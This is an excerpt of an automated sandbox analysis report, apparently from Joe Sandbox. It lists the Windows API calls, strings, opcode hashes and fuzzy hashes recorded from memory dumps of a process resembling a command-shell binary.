                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d7d38d81121354050f916f34c4663a8d1a04ecee0d9816bd4e96b5d9d2e7dbd7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A415E72618B4A86F7509F12A84436DBAA4FB49BC4FC84276DA4A477B4CF7CD1148B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A73
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A91
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526B01
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521673
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152168D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521757
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152176E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521788
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152179C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3586862581-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533687
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336A6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336EB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533703
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D1533722
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 411561164-4129271751
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 73e4c44dfbde5e49fbc3b488a708611a0aeefbb9cbcf1d128f38fa5b779dfd95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1114F22A08A4F86FB906B24E54407CEAA4FF49765FD45376D92F467F0DEBCE4448610
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 15b6ed972d5416d79eac90ec8da7a322252691fe5da477b5a8b52c8d4c00e8d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B115422B04B4A8AFB50EF61E84416C73A4F719758FD00A35EA6E47B64EFBCD2948350
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d1612e03fd0c16682ba2ca1a0f2759109ac8d81b439d0d846e1ebae818eb32b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2514722A4864B85FB66AF16E44427DB6A0FB44B54FD18436DA5F432A1DFBCE890C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d3567b6efcd5d8ba320e2947850ad0ede8341a64a56949b279e31717d43b0b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B11225360864A81FB24AB61E80127DF6A0EF89799FC58133DE0E477B5EF7CD0418724
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 803eba6ff31649e7235b39e315db9048ff9d9c1ecb4f78fabd3f92a2c075e05e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51A327A0568A85FB24AF20D8406BEB6B0FF44758FC58177CE0F876A4EFBC95449720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3883041866-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2124138010038f54997149509e1e503f99574355f749c6d48a30454d44694652
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51413260878A8AFB619F21D8503EDB7A4FB45748FD04136E64E87A68DFBCD644C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: ErrorModememset$FullNamePath_wcsicmp
• String ID:
• API String ID: 2123716050-0
• Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
• Instruction ID: 7c9794c3b42709582e2906f4433896d7577a283744c57734ed01ad4ec0c06245
• Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
• Instruction Fuzzy Hash: FF418032705BCB8AFB729F25D8503EDA794EB49788F844135DA4E4BAA8DF7CD2448710
APIs
  • Part of subcall function 00007FF7D15233A8: iswspace.MSVCRT(?,?,00000000,00007FF7D153D6EE,?,?,?,00007FF7D1530632), ref: 00007FF7D15233C0
• iswspace.MSVCRT(?,?,?,00007FF7D15232A4), ref: 00007FF7D152331C
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: iswspace
• String ID: off
• API String ID: 2389812497-733764931
• Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction ID: beb9a02507d0020e5df83b13a7ad2f7702788e55974cf8f532388b0e0054dcac
• Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction Fuzzy Hash: BF219222E0C65B81FBA07B15941027DE690EF59B80FD88076DA4F8B7A4DEECE540D321
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: %s=%s$DPATH$PATH
• API String ID: 3731854180-3148396303
• Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction ID: 62ed8453b084583fac42654c7a84691a1a7561437b2953b65109ce16d138c36b
• Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction Fuzzy Hash: B521BBA2B0965B80FF50AB55E4402BDE2A0AF81B80FD89137C90F437B5DEBCE4448360
APIs
  • Part of subcall function 00007FF7D1523C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D1523D0C
  • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D2F
  • Part of subcall function 00007FF7D1523C24: iswalpha.MSVCRT ref: 00007FF7D1523D4F
  • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D75
  • Part of subcall function 00007FF7D1523C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523DBF
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516ABF
• RtlFreeHeap.NTDLL ref: 00007FF7D1516AD3
  • Part of subcall function 00007FF7D1516B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B8B
  • Part of subcall function 00007FF7D1516B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B97
  • Part of subcall function 00007FF7D1516B84: RtlFreeHeap.NTDLL ref: 00007FF7D1516BAF
  • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B39
  • Part of subcall function 00007FF7D1516B30: RtlFreeHeap.NTDLL ref: 00007FF7D1516B4D
  • Part of subcall function 00007FF7D1516B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1516AF1,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B59
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516B03
• RtlFreeHeap.NTDLL ref: 00007FF7D1516B17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6D0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B6E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B701
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151AF82), ref: 00007FF7D151B715
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356C5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15356D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7D1535433,?,?,?,00007FF7D15369B8,?,?,?,?,?,00007FF7D1528C39), ref: 00007FF7D15356FD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1535711
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
